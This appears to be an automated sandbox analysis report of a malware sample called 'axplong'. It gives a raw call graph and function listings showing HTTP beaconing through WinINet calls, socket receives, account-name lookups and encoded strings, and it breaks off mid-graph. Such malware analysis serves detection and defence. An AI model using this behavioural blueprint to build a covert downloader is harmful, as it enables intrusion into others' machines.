__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15670->15671 15671->15659 15673 c3cac2 CreateThreadpoolWork 15672->15673 15673->15663 15675 c3b757 Concurrency::details::_Reschedule_chore 15674->15675 15678 c3ccfc 15675->15678 15677 c3b771 15677->15665 15679 c3cd11 TpPostWork 15678->15679 15679->15677 15681 c3b737 15680->15681 15683 c3b747 15680->15683 15681->15683 15684 c3c9a8 15681->15684 15683->15668 15685 c3c9bd TpReleaseWork 15684->15685 15685->15683 15696 c38700 15697 c3d312 RtlAllocateHeap 15696->15697 15698 c3875a __cftof 15697->15698 15706 c39ae0 15698->15706 15700 c38784 15705 c3879c __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15700->15705 15710 c243b0 15700->15710 15704 c3880f 15707 c39b15 15706->15707 15719 c22ca0 15707->15719 15709 c39b46 15709->15700 15711 c3be0f InitOnceExecuteOnce 15710->15711 15712 c243ca 15711->15712 15713 c243d1 15712->15713 15714 c56beb 9 API calls 15712->15714 15716 c3bd80 15713->15716 15715 c243e4 15714->15715 15773 c3bcbb 15716->15773 15718 c3bd96 std::_Throw_future_error 15718->15704 15720 c22cdd 15719->15720 15721 c3be0f InitOnceExecuteOnce 15720->15721 15722 c22d06 15721->15722 15723 c22d11 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15722->15723 15724 c22d48 15722->15724 15728 c3be27 15722->15728 15723->15709 15737 c22400 15724->15737 15729 c3be33 15728->15729 15740 c228c0 15729->15740 15731 c3be53 std::_Throw_future_error 15732 c3bea3 15731->15732 15733 c3be9a 15731->15733 15735 c22aa0 10 API calls 15732->15735 15748 c3bdaf 15733->15748 15736 c3be9f 15735->15736 15736->15724 15768 c3b506 15737->15768 15739 c22432 15741 c37f30 RtlAllocateHeap 15740->15741 15742 c2290f 15741->15742 15743 c22670 RtlAllocateHeap 15742->15743 15745 c22927 15743->15745 15744 c2294d shared_ptr 15744->15731 15745->15744 15746 c537dc ___std_exception_copy RtlAllocateHeap 15745->15746 15747 c229a4 15746->15747 15747->15731 15749 c3cb61 InitOnceExecuteOnce 15748->15749 15750 c3bdc7 15749->15750 15751 c3bdce 15750->15751 15754 c56beb 15750->15754 15751->15736 15753 c3bdd7 15753->15736 15759 c56bf7 __fassign 15754->15759 15755 c58aaf __fassign 2 API calls 15756 c56c26 15755->15756 15757 c56c35 15756->15757 15758 c56c43 15756->15758 15760 c56c99 9 API calls 15757->15760 15761 c568bd 3 API calls 15758->15761 15759->15755 15762 c56c3f 15760->15762 15763 c56c5d 15761->15763 15762->15753 15764 c5681d RtlAllocateHeap 15763->15764 15765 c56c6a 15764->15765 15766 c56c99 9 API calls 15765->15766 15767 c56c71 ___free_lconv_mon 15765->15767 15766->15767 15767->15753 15770 c3b521 std::_Throw_future_error 15768->15770 15769 c58aaf __fassign 2 API calls 15771 c3b5cf 15769->15771 15770->15769 15772 c3b588 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __fassign 15770->15772 15772->15739 15774 c222a0 std::future_error::future_error RtlAllocateHeap 15773->15774 15775 c3bccf 15774->15775 15775->15718 15572 c3b7e9 15573 c3b6e5 11 API calls 15572->15573 15574 c3b811 Concurrency::details::_Reschedule_chore 15573->15574 15575 c3b836 15574->15575 15579 c3cade 15574->15579 15577 c3b648 11 API calls 15575->15577 15578 c3b84e 15577->15578 15580 c3cafc 15579->15580 15581 c3caec TpCallbackUnloadDllOnCompletion 15579->15581 15580->15575 15581->15580 13921 c56beb 13926 c56bf7 __fassign 13921->13926 13923 c56c26 13924 c56c35 13923->13924 13925 c56c43 13923->13925 13927 c56c99 9 API calls 13924->13927 13941 c568bd 13925->13941 13935 c58aaf 13926->13935 13929 c56c3f 13927->13929 13930 c56c5d 13944 c5681d 13930->13944 13934 c56c71 ___free_lconv_mon 13936 c58ab4 __fassign 13935->13936 13938 c58abf __cftof 13936->13938 13961 c5d4f4 13936->13961 13958 c5651d 13938->13958 13940 c58af2 __dosmaperr __fassign 13940->13923 13978 c5683a 13941->13978 13943 c568cf 13943->13930 14014 c5676b 13944->14014 13946 c56835 13946->13934 13947 c56c99 13946->13947 13948 c56cc4 __cftof 13947->13948 13955 c56ca7 __cftof __dosmaperr 13947->13955 13949 c56d06 CreateFileW 13948->13949 13950 c56cea __cftof __dosmaperr 13948->13950 13951 c56d38 13949->13951 13952 c56d2a 13949->13952 13950->13934 14040 c56d77 13951->14040 14028 c56e01 GetFileType 13952->14028 13955->13934 13956 c56d33 __cftof 13956->13950 13957 c56d69 CloseHandle 13956->13957 13957->13950 13966 c563f7 13958->13966 13963 c5d500 __fassign 13961->13963 13962 c5d55c __cftof __dosmaperr __fassign 13962->13938 13963->13962 13964 c5651d __fassign 2 API calls 13963->13964 13965 c5d6ee __dosmaperr __fassign 13964->13965 13965->13938 13968 c56405 __fassign 13966->13968 13967 c56450 13967->13940 13968->13967 13971 c5645b 13968->13971 13976 c5a1c2 GetPEB 13971->13976 13973 c56465 13974 c5646a GetPEB 13973->13974 13975 c5647a __fassign 13973->13975 13974->13975 13977 c5a1dc __fassign 13976->13977 13977->13973 13979 c56851 13978->13979 13980 c5685a 13978->13980 13979->13943 13980->13979 13984 c5b4bb 13980->13984 13985 c5b4ce 13984->13985 13987 c56890 13984->13987 13985->13987 13992 c5f46b 13985->13992 13988 c5b4e8 13987->13988 13989 c5b510 13988->13989 13990 c5b4fb 13988->13990 13989->13979 13990->13989 13997 c5e571 13990->13997 13994 c5f477 __fassign 13992->13994 13993 c5f4c6 13993->13987 13994->13993 13995 c58aaf __fassign 2 API calls 13994->13995 13996 c5f4eb 13995->13996 13998 c5e57b 13997->13998 14001 c5e489 13998->14001 14000 c5e581 14000->13989 14006 c5e495 __fassign ___free_lconv_mon 14001->14006 14002 c5e4b6 14002->14000 14003 c58aaf __fassign 2 API calls 14004 c5e528 14003->14004 14005 c5e564 14004->14005 14010 c5a5ee 14004->14010 14005->14000 14006->14002 14006->14003 14011 c5a611 14010->14011 14012 c58aaf __fassign 2 API calls 14011->14012 14013 c5a687 14012->14013 14015 c56793 14014->14015 14020 c56779 __dosmaperr __fassign 14014->14020 14016 c5679a 14015->14016 14018 c567b9 __fassign 14015->14018 14016->14020 14021 c56916 14016->14021 14019 c56916 RtlAllocateHeap 14018->14019 14018->14020 14019->14020 14020->13946 14022 c56924 14021->14022 14025 c56955 14022->14025 14026 c5af0b __fassign RtlAllocateHeap 14025->14026 14027 c56935 14026->14027 14027->14020 14030 c56e3c __cftof 14028->14030 14039 c56ed2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __dosmaperr 14028->14039 14029 c56e75 GetFileInformationByHandle 14031 c56e8b 14029->14031 14029->14039 14030->14029 14030->14039 14046 c570c9 14031->14046 14035 c56ea8 14036 c56f71 SystemTimeToTzSpecificLocalTime 14035->14036 14037 c56ebb 14036->14037 14038 c56f71 SystemTimeToTzSpecificLocalTime 14037->14038 14038->14039 14039->13956 14071 c57314 14040->14071 14042 c56d85 14043 c56d8a __dosmaperr 14042->14043 14044 c570c9 3 API calls 14042->14044 14043->13956 14045 c56da3 14044->14045 14045->13956 14048 c570df _wcsrchr 14046->14048 14047 c56e97 14056 c56f71 14047->14056 14048->14047 14060 c5b9e4 14048->14060 14050 c57123 14050->14047 14051 c5b9e4 3 API calls 14050->14051 14052 c57134 14051->14052 14052->14047 14053 c5b9e4 3 API calls 14052->14053 14054 c57145 14053->14054 14054->14047 14055 c5b9e4 3 API calls 14054->14055 14055->14047 14057 c56f89 14056->14057 14058 c56fa9 SystemTimeToTzSpecificLocalTime 14057->14058 14059 c56f8f __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 14057->14059 14058->14059 14059->14035 14061 c5b9f2 14060->14061 14062 c5b9f8 __cftof __dosmaperr 14061->14062 14065 c5ba2d 14061->14065 14062->14050 14064 c5ba28 14064->14050 14066 c5ba57 14065->14066 14069 c5ba3d __cftof __dosmaperr 14065->14069 14067 c5683a __fassign 3 API calls 14066->14067 14066->14069 14070 c5ba81 14067->14070 14068 c5b9a5 GetPEB GetPEB RtlAllocateHeap 14068->14070 14069->14064 14070->14068 14070->14069 14072 c57338 14071->14072 14074 c5733e __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z ___std_exception_copy 14072->14074 14075 c57036 14072->14075 14074->14042 14076 c57042 __dosmaperr 14075->14076 14081 c5b87b 14076->14081 14078 c57068 14078->14074 14079 c5705a __dosmaperr 14079->14078 14080 c5b87b RtlAllocateHeap 14079->14080 14080->14078 14084 c5b6de 14081->14084 14083 c5b894 14083->14079 14085 c5b6ee 14084->14085 14086 c5b75a 14084->14086 14085->14086 14087 c5b6f5 14085->14087 14101 c61ef8 14086->14101 14089 c5b702 ___std_exception_copy 14087->14089 14093 c5b675 14087->14093 14089->14083 14091 c5b73b 14097 c5b815 14091->14097 14094 c5b690 14093->14094 14096 c5b695 __dosmaperr 14094->14096 14104 c5b7b7 14094->14104 14096->14091 14098 c5b822 14097->14098 14100 c5b83b __fassign 14097->14100 14099 c58aa4 ___std_exception_copy RtlAllocateHeap 14098->14099 14098->14100 14099->14100 14100->14089 14111 c61d22 14101->14111 14103 c61f0f 14103->14089 14105 c5b7c5 14104->14105 14108 c5b7f6 14105->14108 14109 c58aa4 ___std_exception_copy RtlAllocateHeap 14108->14109 14110 c5b7d6 14109->14110 14110->14096 14112 c61d54 14111->14112 14113 c61d40 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z __cftof __dosmaperr ___std_exception_copy 14111->14113 14112->14113 14114 c5b7b7 RtlAllocateHeap 14112->14114 14113->14103 14115 c61de9 14114->14115 14116 c5b675 RtlAllocateHeap 14115->14116 14117 c61df6 14116->14117 14117->14113 14118 c5b815 RtlAllocateHeap 14117->14118 14118->14113 15689 c56974 15690 c56982 15689->15690 15691 c5698c 15689->15691 15692 c568bd 3 API calls 15691->15692 15693 c569a6 15692->15693 15694 c5681d RtlAllocateHeap 15693->15694 15695 c569b3 ___free_lconv_mon 15694->15695 14119 c2b0d0 14120 c2b122 14119->14120 14121 c37f30 RtlAllocateHeap 14120->14121 14122 c2b163 14121->14122 14123 c37870 RtlAllocateHeap 14122->14123 14124 c2b20d 14123->14124 15317 c288b0 15323 c28a1a 15317->15323 15324 c28908 shared_ptr 15317->15324 15318 c37870 RtlAllocateHeap 15318->15324 15319 c25b20 RtlAllocateHeap 15319->15324 15320 c28a50 15322 c38070 RtlAllocateHeap 15320->15322 15321 c37f30 RtlAllocateHeap 15321->15324 15322->15323 15324->15318 15324->15319 15324->15320 15324->15321 15324->15323 15325 c286b0 15326 c286b6 15325->15326 15327 c286d6 15326->15327 15330 c566e7 15326->15330 15329 c286d0 15331 c566f3 __fassign 15330->15331 15333 c566fd __cftof __dosmaperr 15331->15333 15334 c56670 15331->15334 15333->15329 15335 c56692 15334->15335 15337 c5667d __cftof __dosmaperr ___free_lconv_mon 15334->15337 15335->15337 15338 c59ef9 15335->15338 15337->15333 15339 c59f11 15338->15339 15341 c59f36 15338->15341 15339->15341 15342 c602f8 15339->15342 15341->15337 15343 c60304 __fassign 15342->15343 15345 c6030c __cftof __dosmaperr 15343->15345 15346 c603ea 15343->15346 15345->15341 15347 c6040c 15346->15347 15349 c60410 __cftof __dosmaperr 15346->15349 15347->15349 15350 c5fb7f 15347->15350 15349->15345 15351 c5fbcc 15350->15351 15352 c5683a __fassign 3 API calls 15351->15352 15356 c5fbdb __cftof 15352->15356 15353 c5d2e9 2 API calls 15353->15356 15354 c5c4ea GetPEB GetPEB RtlAllocateHeap __fassign 15354->15356 15355 c5fe7b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15355->15349 15356->15353 15356->15354 15356->15355 15357 c27ab0 15378 c26d40 15357->15378 15359 c37870 RtlAllocateHeap 15360 c27b45 15359->15360 15362 c25b20 RtlAllocateHeap 15360->15362 15361 c27aeb shared_ptr 15361->15359 15377 c27bd6 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr 15361->15377 15363 c27b4d 15362->15363 15364 c37870 RtlAllocateHeap 15363->15364 15365 c27b68 15364->15365 15366 c25b20 RtlAllocateHeap 15365->15366 15367 c27b70 15366->15367 15368 c38250 RtlAllocateHeap 15367->15368 15369 c27b81 15368->15369 15370 c38150 RtlAllocateHeap 15369->15370 15371 c27b91 15370->15371 15372 c37870 RtlAllocateHeap 15371->15372 15373 c27bac 15372->15373 15374 c25b20 RtlAllocateHeap 15373->15374 15375 c27bb3 15374->15375 15376 c37f30 RtlAllocateHeap 15375->15376 15376->15377 15379 c26d80 15378->15379 15380 c26dc5 15379->15380 15381 c26d9a 15379->15381 15383 c37f30 RtlAllocateHeap 15380->15383 15382 c37f30 RtlAllocateHeap 15381->15382 15384 c26dbb shared_ptr 15382->15384 15383->15384 15384->15361 15522 c2e410 15523 c2e435 15522->15523 15525 c2e419 15522->15525 15525->15523 15526 c2e270 15525->15526 15527 c2e280 __dosmaperr 15526->15527 15528 c58979 3 API calls 15527->15528 15529 c2e2bd 15528->15529 15530 c3c0c9 std::_Xinvalid_argument RtlAllocateHeap 15529->15530 15532 c2e40e 15530->15532 15531 c2e435 15531->15525 15532->15531 15533 c2e270 4 API calls 15532->15533 15533->15532 15553 c2dfd0 recv 15554 c2e032 recv 15553->15554 15555 c2e067 recv 15554->15555 15556 c2e0a1 15555->15556 15557 c2e1c3 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15556->15557 15558 c3c5dc GetSystemTimePreciseAsFileTime 15556->15558 15559 c2e1fe 15558->15559 15560 c3c19a 10 API calls 15559->15560 15561 c2e268 15560->15561 15534 c38810 15535 c389f7 15534->15535 15538 c38866 15534->15538 15546 c39110 15535->15546 15537 c389f2 15541 c22440 RtlAllocateHeap 15537->15541 15538->15537 15539 c388d3 15538->15539 15540 c388ac 15538->15540 15544 c3d312 RtlAllocateHeap 15539->15544 15545 c388bd shared_ptr 15539->15545 15540->15537 15542 c388b7 15540->15542 15541->15535 15543 c3d312 RtlAllocateHeap 15542->15543 15543->15545 15544->15545 15547 c3c0e9 RtlAllocateHeap 15546->15547 15548 c3911a 15547->15548 15776 c39310 15777 c39325 15776->15777 15783 c39363 15776->15783 15778 c3d041 SleepConditionVariableCS 15777->15778 15779 c3932f 15778->15779 15780 c3d57e RtlAllocateHeap 15779->15780 15779->15783 15781 c39359 15780->15781 15782 c3cff7 RtlWakeAllConditionVariable 15781->15782 15782->15783 15686 c56559 15687 c563f7 __fassign 2 API calls 15686->15687 15688 c5656a 15687->15688 15385 c3b85e 15390 c3b6e5 15385->15390 15387 c3b886 15398 c3b648 15387->15398 15389 c3b89f 15391 c3b6f1 Concurrency::details::_Reschedule_chore 15390->15391 15392 c3b722 15391->15392 15408 c3c5dc 15391->15408 15392->15387 15396 c3b70c __Mtx_unlock 15397 c22ad0 10 API calls 15396->15397 15397->15392 15399 c3b654 Concurrency::details::_Reschedule_chore 15398->15399 15400 c3b6ae 15399->15400 15401 c3c5dc GetSystemTimePreciseAsFileTime 15399->15401 15400->15389 15402 c3b669 15401->15402 15403 c22ad0 10 API calls 15402->15403 15404 c3b66f __Mtx_unlock 15403->15404 15405 c22ad0 10 API calls 15404->15405 15406 c3b68c 15405->15406 15406->15400 15407 c22ad0 10 API calls 15406->15407 15407->15400 15418 c3c382 15408->15418 15410 c3b706 15411 c22ad0 15410->15411 15412 c22ada 15411->15412 15413 c22adc 15411->15413 15412->15396 15435 c3c19a 15413->15435 15419 c3c3d8 15418->15419 15421 c3c3aa __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 15418->15421 15419->15421 15424 c3ce9b 15419->15424 15421->15410 15422 c3c42d __Xtime_diff_to_millis2 15422->15421 15423 c3ce9b _xtime_get GetSystemTimePreciseAsFileTime 15422->15423 15423->15422 15425 c3ceaa 15424->15425 15427 c3ceb7 __aulldvrm 15424->15427 15425->15427 15428 c3ce74 15425->15428 15427->15422 15431 c3cb1a 15428->15431 15432 c3cb2b GetSystemTimePreciseAsFileTime 15431->15432 15434 c3cb37 15431->15434 15432->15434 15434->15427 15436 c3c1c2 15435->15436 15437 c3c1a4 15435->15437 15436->15436 15437->15436 15439 c3c1c7 15437->15439 15444 c22aa0 15439->15444 15441 c3c1de 15460 c3c12f 15441->15460 15443 c3c1ef std::_Throw_future_error 15443->15437 15466 c3be0f 15444->15466 15446 c22abf 15446->15441 15447 c58aaf __fassign 2 API calls 15449 c56c26 15447->15449 15448 c22ab4 __fassign 15448->15446 15448->15447 15450 c56c35 15449->15450 15451 c56c43 15449->15451 15452 c56c99 9 API calls 15450->15452 15453 c568bd 3 API calls 15451->15453 15454 c56c3f 15452->15454 15455 c56c5d 15453->15455 15454->15441 15456 c5681d RtlAllocateHeap 15455->15456 15457 c56c6a 15456->15457 15458 c56c99 9 API calls 15457->15458 15459 c56c71 ___free_lconv_mon 15457->15459 15458->15459 15459->15441 15461 c3c13b __EH_prolog3_GS 15460->15461 15462 c37f30 RtlAllocateHeap 15461->15462 15463 c3c16d 15462->15463 15473 c22670 15463->15473 15465 c3c182 15465->15443 15469 c3cb61 15466->15469 15470 c3cb6f InitOnceExecuteOnce 15469->15470 15472 c3be22 15469->15472 15470->15472 15472->15448 15474 c37870 RtlAllocateHeap 15473->15474 15475 c226c2 15474->15475 15476 c226e5 15475->15476 15477 c38e70 RtlAllocateHeap 15475->15477 15478 c38e70 RtlAllocateHeap 15476->15478 15480 c2274e shared_ptr 15476->15480 15477->15476 15478->15480 15479 c537dc ___std_exception_copy RtlAllocateHeap 15481 c2280b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z shared_ptr ___std_exception_destroy 15479->15481 15480->15479 15480->15481 15481->15465

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  Function 00C2E440 Relevance: 36.2, APIs: 2, Strings: 17, Instructions: 2960COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00C3795C
                                                                                                                                                                    • Part of subcall function 00C37870: __Cnd_destroy_in_situ.LIBCPMT ref: 00C37968
                                                                                                                                                                    • Part of subcall function 00C37870: __Mtx_destroy_in_situ.LIBCPMT ref: 00C37971
                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 00C307C5
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situXinvalid_argumentstd::_
                                                                                                                                                                  • String ID: puu2B7m$#$111$246122658369$FFNmLv==$FlpmMdzrTXUg$GlNgUSfi8Dy=$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 4234742559-2205604348
                                                                                                                                                                  • Opcode ID: 87982022ba2e89063212463aad95a3762405f0159821735a3a3ab26b4e332b06
                                                                                                                                                                  • Instruction ID: 80a228f247841842e12304944aecc4d8ac4e59830924b437a4cbbb4c14f26ef6
                                                                                                                                                                  • Opcode Fuzzy Hash: 87982022ba2e89063212463aad95a3762405f0159821735a3a3ab26b4e332b06
                                                                                                                                                                  • Instruction Fuzzy Hash: 89337971A101589BEF18DF38DC8979DBB72AF85304F2082ACE405AB7D6DB358AC5CB51
                                                                                                                                                                  Function 00C2BD60 Relevance: 19.6, APIs: 5, Strings: 6, Instructions: 310networkfileCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 2562 c2bd60-c2bdac 2563 c2bdb2-c2bdb6 2562->2563 2564 c2c1a1-c2c1c6 call c37f30 2562->2564 2563->2564 2566 c2bdbc-c2bdc0 2563->2566 2570 c2c1f4-c2c20c 2564->2570 2571 c2c1c8-c2c1d4 2564->2571 2566->2564 2567 c2bdc6-c2be4f InternetOpenW InternetConnectA call c37870 call c25b20 2566->2567 2595 c2be53-c2be6f HttpOpenRequestA 2567->2595 2596 c2be51 2567->2596 2575 c2c212-c2c21e 2570->2575 2576 c2c158-c2c170 2570->2576 2573 c2c1d6-c2c1e4 2571->2573 2574 c2c1ea-c2c1f1 call c3d593 2571->2574 2573->2574 2580 c2c26f-c2c274 call c56b9a 2573->2580 2574->2570 2582 c2c224-c2c232 2575->2582 2583 c2c14e-c2c155 call c3d593 2575->2583 2577 c2c243-c2c25f call c3cf21 2576->2577 2578 c2c176-c2c182 2576->2578 2585 c2c188-c2c196 2578->2585 2586 c2c239-c2c240 call c3d593 2578->2586 2582->2580 2584 c2c234 2582->2584 2583->2576 2584->2583 2585->2580 2594 c2c19c 2585->2594 2586->2577 2594->2586 2600 c2bea0-c2bf0f call c37870 call c25b20 call c37870 call c25b20 2595->2600 2601 c2be71-c2be80 2595->2601 2596->2595 2614 c2bf13-c2bf29 HttpSendRequestA 2600->2614 2615 c2bf11 2600->2615 2602 c2be82-c2be90 2601->2602 2603 c2be96-c2be9d call c3d593 2601->2603 2602->2603 2603->2600 2616 c2bf5a-c2bf82 2614->2616 2617 c2bf2b-c2bf3a 2614->2617 2615->2614 2620 c2bfb3-c2bfd4 InternetReadFile 2616->2620 2621 c2bf84-c2bf93 2616->2621 2618 c2bf50-c2bf57 call c3d593 2617->2618 2619 c2bf3c-c2bf4a 2617->2619 2618->2616 2619->2618 2622 c2bfda 2620->2622 2624 c2bf95-c2bfa3 2621->2624 2625 c2bfa9-c2bfb0 call c3d593 2621->2625 2627 c2bfe0-c2c090 call c54180 2622->2627 2624->2625 2625->2620
                                                                                                                                                                  APIs
                                                                                                                                                                  • InternetOpenW.WININET(00C78D70,00000000,00000000,00000000,00000000), ref: 00C2BDED
                                                                                                                                                                  • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00C2BE11
                                                                                                                                                                  • HttpOpenRequestA.WININET(?,00000000), ref: 00C2BE5B
                                                                                                                                                                  • HttpSendRequestA.WININET(?,00000000), ref: 00C2BF1A
                                                                                                                                                                  • InternetReadFile.WININET(?,?,000003FF,?), ref: 00C2BFCD
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0A7
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0AF
                                                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 00C2C0B7
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
                                                                                                                                                                  • String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$invalid stoi argument$stoi argument out of range
                                                                                                                                                                  • API String ID: 688256393-332458646
                                                                                                                                                                  • Opcode ID: 1f3ea34df5f0cefc6c78bb79f1d89c19fbb3e400cdc7169fe837c0205ba28b8e
                                                                                                                                                                  • Instruction ID: 1754fb3aacec764ac5e5225fbeddd03af6cc3933c007ae2314ad5ff4cb23098c
                                                                                                                                                                  • Opcode Fuzzy Hash: 1f3ea34df5f0cefc6c78bb79f1d89c19fbb3e400cdc7169fe837c0205ba28b8e
                                                                                                                                                                  • Instruction Fuzzy Hash: ACB1F5B1A101289BEB24CF28DC85BAEBB79EF45304F5041A8F509976C2DB749EC0CF95
                                                                                                                                                                  Function 00C265B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 257COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3207 c265b0-c26609 3281 c2660a call 4ef0c7f 3207->3281 3282 c2660a call 4ef0cad 3207->3282 3283 c2660a call 4ef0c0d 3207->3283 3284 c2660a call 4ef0c6c 3207->3284 3285 c2660a call 4ef0bcc 3207->3285 3286 c2660a call 4ef0cc8 3207->3286 3287 c2660a call 4ef0c28 3207->3287 3288 c2660a call 4ef0c08 3207->3288 3289 c2660a call 4ef0bd5 3207->3289 3290 c2660a call 4ef0c42 3207->3290 3291 c2660a call 4ef0c01 3207->3291 3208 c2660f-c26688 LookupAccountNameA call c37870 call c25b20 3214 c2668a 3208->3214 3215 c2668c-c266ab call c22280 3208->3215 3214->3215 3218 c266dc-c266e2 3215->3218 3219 c266ad-c266bc 3215->3219 3222 c266e5-c266ea 3218->3222 3220 c266d2-c266d9 call c3d593 3219->3220 3221 c266be-c266cc 3219->3221 3220->3218 3221->3220 3223 c26907 call c56b9a 3221->3223 3222->3222 3225 c266ec-c26714 call c37870 call c25b20 3222->3225 3230 c2690c call c56b9a 3223->3230 3235 c26716 3225->3235 3236 c26718-c26739 call c22280 3225->3236 3234 c26911-c26916 call c56b9a 3230->3234 3235->3236 3241 c2676a-c2677e 3236->3241 3242 c2673b-c2674a 3236->3242 3248 c26784-c2678a 3241->3248 3249 c26828-c2684c 3241->3249 3243 c26760-c26767 call c3d593 3242->3243 3244 c2674c-c2675a 3242->3244 3243->3241 3244->3230 3244->3243 3250 c26790-c267bd call c37870 call c25b20 3248->3250 3251 c26850-c26855 3249->3251 3267 c267c1-c267e8 call c22280 3250->3267 3268 c267bf 3250->3268 3251->3251 3252 c26857-c268bc call c37f30 * 2 3251->3252 3261 c268e9-c26906 call c3cf21 3252->3261 3262 c268be-c268cd 3252->3262 